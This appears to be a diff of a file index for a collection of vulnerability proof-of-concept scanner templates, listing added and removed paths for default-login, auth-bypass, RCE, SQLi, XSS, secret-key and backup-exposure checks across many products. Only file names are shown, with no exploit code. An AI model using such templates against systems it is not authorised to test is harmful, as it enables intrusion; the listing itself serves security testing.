+./poc/auth/squirrelmail-login-10521.yaml ./poc/auth/squirrelmail-login.yaml ./poc/auth/squirrelmail-vkeyboard-xss-10522.yaml ./poc/auth/sqwebmail-login-panel.yaml @@ -3901,7 +3879,6 @@ ./poc/auth/ssh-weak-public-key.yaml ./poc/auth/ssh-weakkey-exchange-algo.yaml ./poc/auth/ssrf-via-oauth-misconfig-10525.yaml -./poc/auth/ssrf-via-oauth-misconfig-10526.yaml ./poc/auth/ssrf-via-oauth-misconfig-10527.yaml ./poc/auth/stackhawk-api-key.yaml ./poc/auth/stackstorm-default-login-10529.yaml @@ -3912,12 +3889,14 @@ ./poc/auth/stem-audio-table-private-keys.yaml ./poc/auth/steve-login-panel.yaml ./poc/auth/storm-unauthorized-access.yaml -./poc/auth/stripe-api-key-11869.yaml +./poc/auth/stripe-api-key(1).yaml ./poc/auth/stripe-api-key.yaml ./poc/auth/stripe-restricted-key-10553.yaml ./poc/auth/stripe-restricted-key-10554.yaml +./poc/auth/stripe-restricted-key-10555.yaml ./poc/auth/stripe-secret-key-10557.yaml ./poc/auth/stripe-secret-key-10558.yaml +./poc/auth/submitty-login-10567.yaml ./poc/auth/submitty-login-10568.yaml ./poc/auth/submitty-login.yaml ./poc/auth/subrion-login.yaml @@ -3928,7 +3907,6 @@ ./poc/auth/superset-default-login-10574.yaml ./poc/auth/superset-default-login.yaml ./poc/auth/superset-login.yaml -./poc/auth/symantec-dlp-login-10596.yaml ./poc/auth/symantec-dlp-login-10597.yaml ./poc/auth/symantec-dlp-login-10598.yaml ./poc/auth/symantec-dlp-login.yaml @@ -3936,11 +3914,12 @@ ./poc/auth/symantec-epm-login-10600.yaml ./poc/auth/symantec-epm-login-10602.yaml ./poc/auth/symantec-epm-login.yaml +./poc/auth/symantec-ewep-login-10603.yaml ./poc/auth/symantec-ewep-login-10604.yaml ./poc/auth/symantec-ewep-login-10605.yaml -./poc/auth/symantec-ewep-login-10606.yaml ./poc/auth/symantec-ewep-login.yaml ./poc/auth/szhe-default-login-10635.yaml +./poc/auth/szhe-default-login-10636.yaml ./poc/auth/szhe-default-login-10637.yaml ./poc/auth/szhe-default-login-10638.yaml ./poc/auth/szhe-default-password-10639.yaml @@ -3950,7 +3929,6 @@ ./poc/auth/teamcity-login-panel.yaml ./poc/auth/teamtalk-login.yaml ./poc/auth/telecom-gateway-default-login-10686.yaml -./poc/auth/telecom-gateway-default-login.yaml ./poc/auth/telecom-gateway-default-password.yaml ./poc/auth/telecom-gateway-default-password.yml ./poc/auth/telegram-token.yaml @@ -3973,7 +3951,9 @@ ./poc/auth/thruk-login.yaml ./poc/auth/tidb-native-password.yaml ./poc/auth/tidb-unauth-10770.yaml +./poc/auth/tidb-unauth-10771.yaml ./poc/auth/tidb-unauth-10772.yaml +./poc/auth/tidb-unauth.yaml ./poc/auth/tingsboard-default-login.yaml ./poc/auth/tisson-system.yaml ./poc/auth/tlr-2005ksh-login.yaml @@ -3983,7 +3963,6 @@ ./poc/auth/tomcat-default-login-10789.yaml ./poc/auth/tomcat-default-login-10790.yaml ./poc/auth/tomcat-default-login-10791.yaml -./poc/auth/tomcat-default-login.yaml ./poc/auth/tomcat-examples-login_CVE-2022-34305.yaml ./poc/auth/tomcat-manager-default-creds.yaml ./poc/auth/tongda-meeting-unauthorized-access.yml @@ -4020,8 +3999,8 @@ ./poc/auth/trunkey-icpsystem.yaml ./poc/auth/tufin-securetrack-login.yaml ./poc/auth/turnkey-openvpn.yaml -./poc/auth/twitter-secret(1).yaml ./poc/auth/twitter-secret-10862.yaml +./poc/auth/twitter-secret-11870.yaml ./poc/auth/twitter-secret.yaml ./poc/auth/two-factor-authentication-5ab7b9948af1b94d45fbf9a9614e1327.yaml ./poc/auth/two-factor-authentication-6a58c373e9f1efb0b2208a7c07a821f2.yaml @@ -4032,6 +4011,7 @@ ./poc/auth/ucmdb-default-login-10868.yaml ./poc/auth/ucmdb-default-login-10869.yaml ./poc/auth/ucmdb-default-login-10870.yaml +./poc/auth/ucmdb-default-login-10871.yaml ./poc/auth/uk-cookie-consent-0bbba77520762097a09ab36a8d9ac90f.yaml ./poc/auth/uk-cookie-consent.yaml ./poc/auth/uk-cookie-d24507ac932285b70361a7e9dd308165.yaml @@ -4042,29 +4022,34 @@ ./poc/auth/unauth-ftp-10939.yaml ./poc/auth/unauth-ftp-10940.yaml ./poc/auth/unauth-ftp-10941.yaml +./poc/auth/unauth-ftp-10942.yaml ./poc/auth/unauth-ftp.yaml ./poc/auth/unauth-hoteldruid-panel-1.yaml -./poc/auth/unauth-hoteldruid-panel-10943.yaml ./poc/auth/unauth-hoteldruid-panel-2.yaml +./poc/auth/unauth-hoteldruid-panel.yaml ./poc/auth/unauth-kubecost.yaml ./poc/auth/unauth-ldap-account-manager.yaml ./poc/auth/unauth-mautic-upgrade.yaml ./poc/auth/unauth-mercurial.yaml ./poc/auth/unauth-message-read-1.yaml ./poc/auth/unauth-message-read-10944.yaml -./poc/auth/unauth-message-read-10945.yaml +./poc/auth/unauth-message-read-10946.yaml ./poc/auth/unauth-message-read-10947.yaml ./poc/auth/unauth-message-read-2.yaml +./poc/auth/unauth-message-read.yaml ./poc/auth/unauth-opache-control-panel.yaml ./poc/auth/unauth-rlm-10960.yaml ./poc/auth/unauth-rlm.yaml +./poc/auth/unauth-spark-api-10961.yaml ./poc/auth/unauth-spark-api-10962.yaml ./poc/auth/unauth-spark-api-10963.yaml ./poc/auth/unauth-spark-api-10964.yaml ./poc/auth/unauth-spark-api-10965.yaml +./poc/auth/unauth-spark-api.yaml ./poc/auth/unauth-temporal-web-ui.yaml ./poc/auth/unauth-wavink-panel-10966.yaml -./poc/auth/unauth-xproxy-dashboard-10968.yaml +./poc/auth/unauth-wavink-panel-10967.yaml +./poc/auth/unauth-xproxy-dashboard-10969.yaml ./poc/auth/unauth-xproxy-dashboard.yaml ./poc/auth/unauth-zwave-mqtt.yaml ./poc/auth/unauthen-elastic.yaml @@ -4073,7 +4058,6 @@ ./poc/auth/unauthenticated-airflow-10885.yaml ./poc/auth/unauthenticated-airflow-10886.yaml ./poc/auth/unauthenticated-airflow.yaml -./poc/auth/unauthenticated-alert-manager-10888.yaml ./poc/auth/unauthenticated-alert-manager-10889.yaml ./poc/auth/unauthenticated-alert-manager-10890.yaml ./poc/auth/unauthenticated-alert-manager-10891.yaml @@ -4083,8 +4067,9 @@ ./poc/auth/unauthenticated-frp-10896.yaml ./poc/auth/unauthenticated-frp-10897.yaml ./poc/auth/unauthenticated-frp.yaml +./poc/auth/unauthenticated-glances-10898.yaml ./poc/auth/unauthenticated-glances-10899.yaml -./poc/auth/unauthenticated-glances.yaml +./poc/auth/unauthenticated-glowroot-10900.yaml ./poc/auth/unauthenticated-glowroot-10901.yaml ./poc/auth/unauthenticated-glowroot-10902.yaml ./poc/auth/unauthenticated-influxdb-10903.yaml @@ -4100,7 +4085,6 @@ ./poc/auth/unauthenticated-mongo-express-10909.yaml ./poc/auth/unauthenticated-mongo-express-10910.yaml ./poc/auth/unauthenticated-mongo-express-2.yaml -./poc/auth/unauthenticated-mongo-express.yaml ./poc/auth/unauthenticated-nacos-access-1.yaml ./poc/auth/unauthenticated-nacos-access-10912.yaml ./poc/auth/unauthenticated-nacos-access-10913.yaml @@ -4118,6 +4102,7 @@ ./poc/auth/unauthenticated-popup-upload-10923.yaml ./poc/auth/unauthenticated-prtg-10924.yaml ./poc/auth/unauthenticated-prtg-10925.yaml +./poc/auth/unauthenticated-prtg-10926.yaml ./poc/auth/unauthenticated-prtg-10927.yaml ./poc/auth/unauthenticated-prtg-10928.yaml ./poc/auth/unauthenticated-qax-vpn-access.yaml @@ -4125,26 +4110,27 @@ ./poc/auth/unauthenticated-tensorboard.yaml ./poc/auth/unauthenticated-varnish-cache-purge-10931.yaml ./poc/auth/unauthenticated-varnish-cache-purge-10932.yaml +./poc/auth/unauthenticated-varnish-cache-purge-10933.yaml ./poc/auth/unauthenticated-varnish-cache-purge-10934.yaml -./poc/auth/unauthenticated-varnish-cache-purge.yaml ./poc/auth/unauthenticated-zipkin-10935.yaml ./poc/auth/unauthenticated-zipkin.yaml ./poc/auth/unauthenticated-zippkin-10938.yaml ./poc/auth/unauthenticated-zippkin.yaml ./poc/auth/unauthorized-access-to-secret.yaml ./poc/auth/unauthorized-brother-access-detect.yaml +./poc/auth/unauthorized-h3csecparh-login-10948.yaml ./poc/auth/unauthorized-h3csecparh-login-10949.yaml -./poc/auth/unauthorized-h3csecparh-login.yaml ./poc/auth/unauthorized-hp-officepro-printer-10950.yaml ./poc/auth/unauthorized-hp-officepro-printer.yaml -./poc/auth/unauthorized-hp-printer-10951.yaml ./poc/auth/unauthorized-hp-printer-10952.yaml +./poc/auth/unauthorized-hp-printer-10953.yaml ./poc/auth/unauthorized-hp-printer-10954.yaml ./poc/auth/unauthorized-hp-printer.yaml +./poc/auth/unauthorized-plastic-scm-10955.yaml ./poc/auth/unauthorized-plastic-scm-10956.yaml ./poc/auth/unauthorized-plastic-scm-10957.yaml ./poc/auth/unauthorized-printer-hp.yaml -./poc/auth/unauthorized-puppet-node-manager-detect-10958.yaml +./poc/auth/unauthorized-puppet-node-manager-detect-10959.yaml ./poc/auth/unauthorized-puppet-node-manager-detect.yaml ./poc/auth/unencrypted-bigip-ltm-cookie-10972.yaml ./poc/auth/unencrypted-bigip-ltm-cookie-10973.yaml @@ -4171,7 +4157,6 @@ ./poc/auth/versa-director-login.yaml ./poc/auth/versa-flexvnf-ui-default-login.yaml ./poc/auth/vidyo-default-login-11008.yaml -./poc/auth/vidyo-default-login-11009.yaml ./poc/auth/vidyo-default-login-11010.yaml ./poc/auth/vidyo-login.yaml ./poc/auth/vigor-login-11020.yaml @@ -4184,12 +4169,13 @@ ./poc/auth/visionhub-default-login-11026.yaml ./poc/auth/visionhub-default-login-11027.yaml ./poc/auth/visionhub-default-login-11028.yaml +./poc/auth/visionhub-default-login-11029.yaml +./poc/auth/visionhub-default-login.yaml ./poc/auth/visual-footer-credit-remover-40c1f14bac0deb0ecd086748a7d4c541.yaml ./poc/auth/visual-footer-credit-remover.yaml ./poc/auth/vmware-hcx-login.yaml ./poc/auth/vmware-nsx-login.yaml ./poc/auth/vmware-vcenter-unauthorized-rce-cve-2021-21972.yml -./poc/auth/vpms-auth-bypass-11066.yaml ./poc/auth/vpms-auth-bypass-11067.yaml ./poc/auth/vpms-auth-bypass-11068.yaml ./poc/auth/vpms-auth-bypass-11069.yaml @@ -4199,9 +4185,9 @@ ./poc/auth/wanhu-ezoffice-wf-accessory-delete-sqli.yaml ./poc/auth/wanhuOA-default-login.yaml ./poc/auth/wanhuOA-sqli-outMailLoginCheck.yaml +./poc/auth/watchguard-credentials-disclosure-11105.yaml ./poc/auth/watchguard-credentials-disclosure-11106.yaml ./poc/auth/watchguard-credentials-disclosure-11107.yaml -./poc/auth/watchguard-credentials-disclosure.yaml ./poc/auth/wayos-ac-centralized-management-system-default-weak-password.yaml ./poc/auth/wayos-default-password.yaml ./poc/auth/wazuh-default-login.yaml @@ -4217,7 +4203,6 @@ ./poc/auth/web3-authentication.yaml ./poc/auth/weblogic-login-11150.yaml ./poc/auth/weblogic-login.yaml -./poc/auth/weblogic-weak-login-11154.yaml ./poc/auth/weblogic-weak-login-11155.yaml ./poc/auth/weblogic-weak-login-11156.yaml ./poc/auth/webmethod-integration-default-login.yaml @@ -4234,7 +4219,7 @@ ./poc/auth/wifisky-default-login-11201.yaml ./poc/auth/wifisky-default-login-11203.yaml ./poc/auth/wifisky-default-login-11204.yaml -./poc/auth/wifisky-default-password-11205.yaml +./poc/auth/wifisky-default-login.yaml ./poc/auth/wifisky-default-password-11206.yaml ./poc/auth/wifisky-default-password-cnvd-2021-39012.yml ./poc/auth/wifisky-default-password.yaml @@ -4262,12 +4247,13 @@ ./poc/auth/wordpress-social-login-b781eead4b5ba9bc8c3b062bb99fd9d7.yaml ./poc/auth/wordpress-social-login-fdde8f99a63be59c05d67adb318b5ef2.yaml ./poc/auth/wordpress-social-login.yaml +./poc/auth/wordpress-updraftplus-pem-key-11325.yaml ./poc/auth/wordpress-updraftplus-pem-key-11326.yaml -./poc/auth/wordpress-updraftplus-pem-key-11327.yaml ./poc/auth/wordpress-updraftplus-pem-key-11328.yaml ./poc/auth/wordpress-updraftplus-pem-key.yaml ./poc/auth/wordpress-weak-credentials-11334.yaml ./poc/auth/wordpress-weak-credentials-11335.yaml +./poc/auth/wordpress-weak-credentials-11336.yaml ./poc/auth/wordpress-weak-credentials-11337.yaml ./poc/auth/wordpress-weak-credentials.yaml ./poc/auth/wp-activate-register-redirect.yaml @@ -4357,8 +4343,8 @@ ./poc/auth/wpdm-cache-session-11438.yaml ./poc/auth/wpdm-cache-session-11439.yaml ./poc/auth/wpdm-cache-session.yaml -./poc/auth/wpmudev-pub-keys-11504.yaml ./poc/auth/wpmudev-pub-keys-11505.yaml +./poc/auth/wpmudev-pub-keys-11506.yaml ./poc/auth/wpmudev-pub-keys-11507.yaml ./poc/auth/wpmudev-pub-keys.yaml ./poc/auth/wpo365-login-b42359728e76b0d180e7fa1e8292b5a9.yaml @@ -4388,28 +4374,31 @@ ./poc/auth/wps-limit-login-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/auth/wps-limit-login-plugin.yaml ./poc/auth/wps-limit-login.yaml +./poc/auth/wso2-default-login-11640.yaml ./poc/auth/wso2-default-login-11641.yaml ./poc/auth/wso2-default-login-11642.yaml ./poc/auth/wso2-default-login-11643.yaml ./poc/auth/wso2-default-password.yaml -./poc/auth/xenforo-login-11670.yaml ./poc/auth/xenforo-login-11671.yaml +./poc/auth/xenforo-login-11672.yaml ./poc/auth/xenforo-login-11673.yaml +./poc/auth/xenforo-login-11674.yaml ./poc/auth/xenforo-login.yaml ./poc/auth/xenmobile-login-11676.yaml ./poc/auth/xenmobile-login-11677.yaml ./poc/auth/xenmobile-login.yaml ./poc/auth/xerox-workcentre7-default-password.yaml ./poc/auth/xerox7-default-login-11678.yaml +./poc/auth/xerox7-default-login-11679.yaml ./poc/auth/xerox7-default-login-11680.yaml ./poc/auth/xerox7-default-password.yaml ./poc/auth/xiaomi-wireless-router-login.yaml ./poc/auth/xibocms-login.yaml ./poc/auth/xidite-wifi-web-cookie-bypass.yaml ./poc/auth/xnat-login.yaml -./poc/auth/xvr-login-11702.yaml ./poc/auth/xvr-login-11703.yaml ./poc/auth/xvr-login-11704.yaml +./poc/auth/xvr-login-11705.yaml ./poc/auth/xvr-login-11706.yaml ./poc/auth/xvr-login.yaml ./poc/auth/xxljob-default-login-11709.yaml @@ -4418,6 +4407,7 @@ ./poc/auth/xxljob-default-login-11712.yaml ./poc/auth/xxljob-default-login-11713.yaml ./poc/auth/xxljob-default-login-11714.yaml +./poc/auth/xxljob-default-login.yaml ./poc/auth/yealinkpreauthrce.yaml ./poc/auth/yith-easy-login-register-popup-for-woocommerce-af03f00eafbcbe5e2d95aac25b61c1ec.yaml ./poc/auth/yith-easy-login-register-popup-for-woocommerce.yaml @@ -4452,29 +4442,27 @@ ./poc/auth/zabbix-default-credentials.yaml ./poc/auth/zabbix-default-login-11760.yaml ./poc/auth/zabbix-default-login-11761.yaml -./poc/auth/zabbix-default-login-11763.yaml +./poc/auth/zabbix-default-login-11762.yaml ./poc/auth/zabbix-default-login.yaml ./poc/auth/zabbix-default-password.yaml ./poc/auth/zabbix-default-password.yml ./poc/auth/zabbix-server-login-11767.yaml ./poc/auth/zabbix-server-login-11768.yaml -./poc/auth/zabbix-server-login-11770.yaml +./poc/auth/zabbix-server-login-11769.yaml ./poc/auth/zabbix-server-login.yaml ./poc/auth/zapier-webhook-token-11771.yaml ./poc/auth/zenario-login-panel-11776.yaml ./poc/auth/zenario-login-panel.yaml ./poc/auth/zentao-zentaosid-auth-bypass.yaml -./poc/auth/zeroshell-login-11788.yaml ./poc/auth/zeroshell-login-11789.yaml +./poc/auth/zeroshell-login-11790.yaml ./poc/auth/zeroshell-login.yaml ./poc/auth/zhiyuan-oa-session-leak-11801.yaml -./poc/auth/zhiyuan-oa-session-leak-11802.yaml ./poc/auth/zhiyuan-oa-session-leak-11803.yaml ./poc/auth/zhiyuan-oa-session-leak-11804.yaml ./poc/auth/zhiyuan-oa-session-leak-11805.yaml -./poc/auth/zhiyuan-oa-session-leak.yaml +./poc/auth/zhiyuan-oa-unauthorized-11806.yaml ./poc/auth/zhiyuan-oa-unauthorized-11807.yaml -./poc/auth/zhiyuan-oa-unauthorized-11808.yaml ./poc/auth/zhiyuan-oa-unauthorized.yaml ./poc/auth/zhiyuan-session-leakage.yaml ./poc/auth/zimbra-preauth-ssrf-11809.yaml @@ -4487,17 +4475,16 @@ ./poc/auth/zm-ajax-login-register-958d915ce8345b3dfafeec38330d0d57.yaml ./poc/auth/zm-ajax-login-register.yaml ./poc/auth/zmanda-default-credential.yaml -./poc/auth/zmanda-default-login-11825.yaml ./poc/auth/zmanda-default-login-11826.yaml ./poc/auth/zmanda-default-login-11827.yaml ./poc/auth/zmanda-default-login-11828.yaml -./poc/auth/zmanda-default-login.yaml ./poc/auth/zms-auth-bypass-11829.yaml ./poc/auth/zms-auth-bypass-11831.yaml ./poc/auth/zms-auth-bypass-11832.yaml ./poc/auth/zms-auth-bypass.yaml ./poc/auth/zoho-webhook-token-11835.yaml ./poc/auth/zoho-webhook-token-11836.yaml +./poc/auth/zoho-webhook-token-11837.yaml ./poc/auth/zoneminder-login.yaml ./poc/auth/zyxel-vmg1312b10d-login.yaml ./poc/auth/zyxel-vsg1432b101-login.yaml @@ -4667,7 +4654,6 @@ ./poc/aws/amazon-mws-auth-token-283.yaml ./poc/aws/amazon-mws-auth-token-detect.yaml ./poc/aws/amazon-mws-auth-token.yaml -./poc/aws/amazon-mws-auth-token_重复副本.yaml ./poc/aws/amazon-phish.yaml ./poc/aws/amazon-product-in-a-post-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/aws/amazon-product-in-a-post-plugin-d983383ac1f96dc90524e93ede3ac0bd.yaml @@ -4694,8 +4680,11 @@ ./poc/aws/arconix-faq-03fd7fbcfd3967eecec2212a351e2737.yaml ./poc/aws/arconix-shortcodes-03fd7fbcfd3967eecec2212a351e2737.yaml ./poc/aws/armember-membership-76d089af6b78d98ec2c18a1732ae08c5.yaml +./poc/aws/aws-access-id-618.yaml ./poc/aws/aws-access-id-619.yaml +./poc/aws/aws-access-id-620.yaml ./poc/aws/aws-access-id.yaml +./poc/aws/aws-access-key-value-621.yaml ./poc/aws/aws-access-key-value-622.yaml ./poc/aws/aws-access-key-value-623.yaml ./poc/aws/aws-access-key-value-625.yaml @@ -4712,17 +4701,17 @@ ./poc/aws/aws-cdn-by-wpadmin-975bccdb766488fb23747f51954fe8b7.yaml ./poc/aws/aws-cdn-by-wpadmin.yaml ./poc/aws/aws-cloudfront-service-633.yaml -./poc/aws/aws-cloudfront-service-635.yaml -./poc/aws/aws-cloudfront-service.yaml +./poc/aws/aws-cloudfront-service-634.yaml ./poc/aws/aws-cognito-636.yaml ./poc/aws/aws-cognito-637.yaml +./poc/aws/aws-cognito-638.yaml ./poc/aws/aws-cognito.yaml ./poc/aws/aws-config-not-enabled.yaml ./poc/aws/aws-ec2-autoscale.yaml ./poc/aws/aws-ec2-sto.yaml ./poc/aws/aws-ec2.yaml -./poc/aws/aws-ecs-container-agent-tasks-639.yaml ./poc/aws/aws-ecs-container-agent-tasks-640.yaml +./poc/aws/aws-ecs-container-agent-tasks-641.yaml ./poc/aws/aws-ecs-container-agent-tasks.yaml ./poc/aws/aws-elastic-beanstalk-detect-642.yaml ./poc/aws/aws-elastic-beanstalk-detect-643.yaml @@ -4735,13 +4724,12 @@ ./poc/aws/aws-object-listing-646.yaml ./poc/aws/aws-object-listing-647.yaml ./poc/aws/aws-object-listing.yaml -./poc/aws/aws-opensearch-login-649.yaml +./poc/aws/aws-opensearch-login-650.yaml ./poc/aws/aws-opensearch-login.yaml ./poc/aws/aws-rds-cluster.yaml -./poc/aws/aws-redirect-651.yaml +./poc/aws/aws-redirect-652.yaml ./poc/aws/aws-redirect-653.yaml ./poc/aws/aws-redirect-654.yaml -./poc/aws/aws-redirect.yaml ./poc/aws/aws-s3-bucket-enum.yaml ./poc/aws/aws-s3-misconfig.yaml ./poc/aws/aws-s3-open-bucket.yaml @@ -4753,7 +4741,6 @@ ./poc/aws/awstats-config-1.yaml ./poc/aws/awstats-config-2.yaml ./poc/aws/awstats-config-655.yaml -./poc/aws/awstats-config-656.yaml ./poc/aws/awstats-script-1.yaml ./poc/aws/awstats-script-2.yaml ./poc/aws/awstats-script-3.yaml @@ -4775,6 +4762,7 @@ ./poc/aws/cforms2-2bec0230ec2e29ba3c26ba7cb1858f1a.yaml ./poc/aws/chronoforms-3c97c9a74c23d051ec22745b993978f5.yaml ./poc/aws/clean-contact-4a75c234eec2fa231269c18121d10df8.yaml +./poc/aws/clearfy-ec9e3086bbcfcc850fb5fbec286cfaef.yaml ./poc/aws/cloud-enum-aws-app.yaml ./poc/aws/cloud-enum-aws-s3-bucket.yaml ./poc/aws/cloudfront-logging-not-enabled.yaml @@ -4805,8 +4793,9 @@ ./poc/aws/easy-social-share-buttons3-e0aa24259cf0a30b2f7bcdf9cdfc6d39.yaml ./poc/aws/easy-social-share-buttons3.yaml ./poc/aws/easy-testimonials-63219e4a52f76a6b0555468e9ceec2c8.yaml -./poc/aws/ec2-detection-7161.yaml ./poc/aws/ec2-detection-7162.yaml +./poc/aws/ec2-detection-7163.yaml +./poc/aws/ec2-detection.yaml ./poc/aws/ec2-instance-information.yaml ./poc/aws/edd-amazon-s3-0a9c584008d1e4514631aabcae93856c.yaml ./poc/aws/edd-amazon-s3.yaml @@ -4934,6 +4923,7 @@ ./poc/aws/s3cfg.yaml ./poc/aws/s3cmd-config-9960.yaml ./poc/aws/s3cmd-config.yaml +./poc/aws/s3hunter-9966.yaml ./poc/aws/seo-redirection-19ac51f8b0405a9ec28804b8aaa29d9c.yaml ./poc/aws/shortcode-to-display-post-and-user-data-de49acf101613cf75ec2c5768e1c6771.yaml ./poc/aws/smart-slider-2-dfef1caa58305d7dcec2804d684ea5a9.yaml @@ -5032,8 +5022,8 @@ ./poc/backup/Wordpress-WP_Quiz_Plugins-DatabaseBackupDisclosure.yaml ./poc/backup/Wordpress-db-backup-InfoDisclosure.yaml ./poc/backup/Wordpress-newwpml_Plugins-DatabaseBackupDownload.yaml +./poc/backup/adb-backup-enabled-60.yaml ./poc/backup/adb-backup-enabled-61.yaml -./poc/backup/adb-backup-enabled-62.yaml ./poc/backup/adb-backup-enabled-63.yaml ./poc/backup/adb-backup-enabled.yaml ./poc/backup/android-manifest-allow-backup-enabled.yaml @@ -5131,6 +5121,7 @@ ./poc/backup/database-backups.yaml ./poc/backup/db-backup-4ce5dcbee48b05bd3f2e0709e37bed82.yaml ./poc/backup/db-backup-lfi-6774.yaml +./poc/backup/db-backup-lfi-6775.yaml ./poc/backup/db-backup-lfi-6776.yaml ./poc/backup/db-backup-lfi.yaml ./poc/backup/db-backup.yaml @@ -5191,19 +5182,19 @@ ./poc/backup/php-backup-files-7.yaml ./poc/backup/php-backup-files-8.yaml ./poc/backup/php-backup-files-9.yaml -./poc/backup/php-backup-files-9497.yaml +./poc/backup/php-backup-files-9498.yaml ./poc/backup/php-backup-files.yaml ./poc/backup/phpmybackuppro.yaml ./poc/backup/recent-backups-aecbf28838f410f4e37aa987e88ec484.yaml ./poc/backup/recent-backups.yaml ./poc/backup/server-backup-login-10153.yaml +./poc/backup/server-backup-login-10154.yaml ./poc/backup/server-backup-login-10155.yaml -./poc/backup/server-backup-login-10156.yaml ./poc/backup/server-backup-login.yaml ./poc/backup/server-backup-manager-se-10157.yaml ./poc/backup/server-backup-manager-se-10158.yaml ./poc/backup/server-backup-manager-se-10159.yaml -./poc/backup/server-backup-manager-se-10160.yaml +./poc/backup/server-backup-manager-se-10161.yaml ./poc/backup/server-backup-manager-se-login-detect.yaml ./poc/backup/server-backup-manager-se.yaml ./poc/backup/simple-backup-5b5a915298c506568ccfea128a48ed8d.yaml @@ -5222,8 +5213,8 @@ ./poc/backup/wordpress-backup-to-dropbox-964be2e88209fd4788a68b0c1ee81e79.yaml ./poc/backup/wordpress-backup-to-dropbox.yaml ./poc/backup/wordpress-db-backup-11251.yaml +./poc/backup/wordpress-db-backup-listing-11248.yaml ./poc/backup/wordpress-db-backup-listing-11249.yaml -./poc/backup/wordpress-db-backup-listing-11250.yaml ./poc/backup/wordpress-db-backup-listing.yaml ./poc/backup/wordpress-db-backup.yaml ./poc/backup/wordpress-total-upkeep-backup-download-11323.yaml @@ -5372,11 +5363,12 @@ ./poc/cisco/cisco-anyconnect-vpn.yaml ./poc/cisco/cisco-asa-honeypot-detection.yaml ./poc/cisco/cisco-asa-panel-933.yaml +./poc/cisco/cisco-asa-panel-934.yaml ./poc/cisco/cisco-asa-panel-935.yaml ./poc/cisco/cisco-asa-panel.yaml ./poc/cisco/cisco-asa-version.yaml ./poc/cisco/cisco-asa-workflow.yaml -./poc/cisco/cisco-cloudcenter-suite-rce.yaml +./poc/cisco/cisco-cloudcenter-suite-log4j-rce.yaml ./poc/cisco/cisco-cve-2020-3452-readfile.yml ./poc/cisco/cisco-edge-340-937.yaml ./poc/cisco/cisco-edge-340.yaml @@ -5408,15 +5400,15 @@ ./poc/cisco/cisco-prime-infrastructure.yaml ./poc/cisco/cisco-prime-network-registrar.yaml ./poc/cisco/cisco-rv-series-rce.yaml -./poc/cisco/cisco-sd-wan-955.yaml ./poc/cisco/cisco-sd-wan-956.yaml +./poc/cisco/cisco-sd-wan-957.yaml ./poc/cisco/cisco-sd-wan.yaml ./poc/cisco/cisco-secure-cn-959.yaml ./poc/cisco/cisco-secure-cn.yaml +./poc/cisco/cisco-secure-desktop-960.yaml ./poc/cisco/cisco-secure-desktop-961.yaml ./poc/cisco/cisco-secure-desktop-962.yaml ./poc/cisco/cisco-secure-desktop.yaml -./poc/cisco/cisco-security-details-963.yaml ./poc/cisco/cisco-security-details-964.yaml ./poc/cisco/cisco-security-details.yaml ./poc/cisco/cisco-sendgrid-965.yaml @@ -5428,11 +5420,11 @@ ./poc/cisco/cisco-smi-exposure-971.yaml ./poc/cisco/cisco-smi-exposure-972.yaml ./poc/cisco/cisco-ssl-vpn.yaml +./poc/cisco/cisco-systems-login-973.yaml ./poc/cisco/cisco-systems-login-974.yaml -./poc/cisco/cisco-systems-login-975.yaml ./poc/cisco/cisco-systems-login.yaml +./poc/cisco/cisco-telepresence-976.yaml ./poc/cisco/cisco-telepresence-977.yaml -./poc/cisco/cisco-telepresence-978.yaml ./poc/cisco/cisco-telepresence.yaml ./poc/cisco/cisco-ucm.yaml ./poc/cisco/cisco-ucs-director-panel-detect.yaml @@ -5453,9 +5445,8 @@ ./poc/coldfusion/adobe-coldfusion-detect-4.yaml ./poc/coldfusion/adobe-coldfusion-detect-5.yaml ./poc/coldfusion/adobe-coldfusion-detect-6.yaml -./poc/coldfusion/adobe-coldfusion-detect-82.yaml +./poc/coldfusion/adobe-coldfusion-detect-83.yaml ./poc/coldfusion/adobe-coldfusion-detect-84.yaml -./poc/coldfusion/adobe-coldfusion-detect.yaml ./poc/coldfusion/adobe-coldfusion-detector-1.yaml ./poc/coldfusion/adobe-coldfusion-detector-2.yaml ./poc/coldfusion/adobe-coldfusion-detector-3.yaml @@ -5472,17 +5463,18 @@ ./poc/coldfusion/coldfusion-24b621f9d6e75befd4cd3fcef8dc4c5a.yaml ./poc/coldfusion/coldfusion-2f73f13842d918b6b1386a8c93903200.yaml ./poc/coldfusion/coldfusion-3caa015e9cc1bbc260607f4d03476581.yaml +./poc/coldfusion/coldfusion-administrator-login-1143.yaml ./poc/coldfusion/coldfusion-administrator-login-1144.yaml +./poc/coldfusion/coldfusion-administrator-login-1145.yaml ./poc/coldfusion/coldfusion-administrator-login-1146.yaml -./poc/coldfusion/coldfusion-administrator-login-1147.yaml ./poc/coldfusion/coldfusion-administrator-login.yaml ./poc/coldfusion/coldfusion-cve-2010-2861-lfi.yml ./poc/coldfusion/coldfusion-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/coldfusion/coldfusion-debug-xss-1.yaml +./poc/coldfusion/coldfusion-debug-xss-1152.yaml ./poc/coldfusion/coldfusion-debug-xss-1153.yaml ./poc/coldfusion/coldfusion-debug-xss-1154.yaml ./poc/coldfusion/coldfusion-debug-xss-2.yaml -./poc/coldfusion/coldfusion-debug-xss.yaml ./poc/coldfusion/coldfusion-lucee-auth-bypass.yaml ./poc/coldfusion/coldfusion-theme-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/coldfusion/coldfusion-theme.yaml @@ -5490,8 +5482,8 @@ ./poc/coldfusion/coldfusion.yaml ./poc/coldfusion/custom-coldfusion-component-browser-login.yaml ./poc/coldfusion/tenda-w15e-routercfm-cfg-config-leak.yaml +./poc/coldfusion/unpatched-coldfusion-10977.yaml ./poc/coldfusion/unpatched-coldfusion-10978.yaml -./poc/coldfusion/unpatched-coldfusion-10979.yaml ./poc/coldfusion/unpatched-coldfusion.yaml ./poc/coldfusion/wcfm-marketplace-rest-api-83211a697400a39f3ef0aefc82922e72.yaml ./poc/coldfusion/wcfm-marketplace-rest-api.yaml @@ -5516,9 +5508,9 @@ ./poc/config/_config.yml ./poc/config/account-confirmation-link-manipulation.yaml ./poc/config/aem_misconfig.yaml +./poc/config/aerohive-netconfig-ui-199.yaml ./poc/config/aerohive-netconfig-ui-200.yaml ./poc/config/aerohive-netconfig-ui-201.yaml -./poc/config/aerohive-netconfig-ui.yaml ./poc/config/airflow-configuration-exposure-229.yaml ./poc/config/airflow-configuration-exposure-230.yaml 